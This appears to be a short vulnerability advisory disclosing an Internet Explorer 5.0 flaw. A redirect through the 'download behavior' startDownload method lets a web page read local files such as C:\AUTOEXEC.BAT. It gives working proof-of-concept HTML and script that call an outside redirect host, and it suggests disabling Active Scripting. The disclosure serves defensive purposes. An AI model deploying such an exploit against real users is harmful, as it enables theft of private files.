Description:
Internet Explorer 5.0 under Windows 95 and Windows NT 4.0 (suppose Win98
is vulnerable)
allows reading local text files (the extension does not matter) and
parts of binary files.
It is also possible to read text files from any domain and in some
cases reading files from a web server behind a firewall.
Details:
The problem is the IE feature "download behavior".
It is possible to click on a link and a callback function to be executed.
When the callback function is executed by "startDownload" method, the
downloaded file is passed as an argument to the callback function.
Microsoft has implemented some security which does not allow downloading
files in this way from a different domain.
But if the link points to a file in same domain as the exploit page
and a HTTP redirect is forced,
then the exploit works.
It is not necessary the user to click on the link, this may be done
automatically.
This vulnerability may be exploited using HTML email message or a newsgroup
posting.
The code is:
----------------------------------------------------------------------------------------
<SCRIPT>
function doit(s)
{
alert ("Here is your file:\n"+s);
}
</SCRIPT>
<A ID="oD" STYLE="behavior:url(#default#download)" HREF="javascript:oD.startDownload('http://www.guninski.com/reject.cgi?autoexec',
doit)">Click here to read C:\AUTOEXEC.BAT</A>.
----------------------------------------------------------------------------------------
("http://www.guninski.com/reject.cgi?autoexec" just does a HTTP redirect
to file://c:/autoexec.bat)
Workaround:
Disable Active Scripting
Demonstration:
Click
here to read C:\AUTOEXEC.BAT.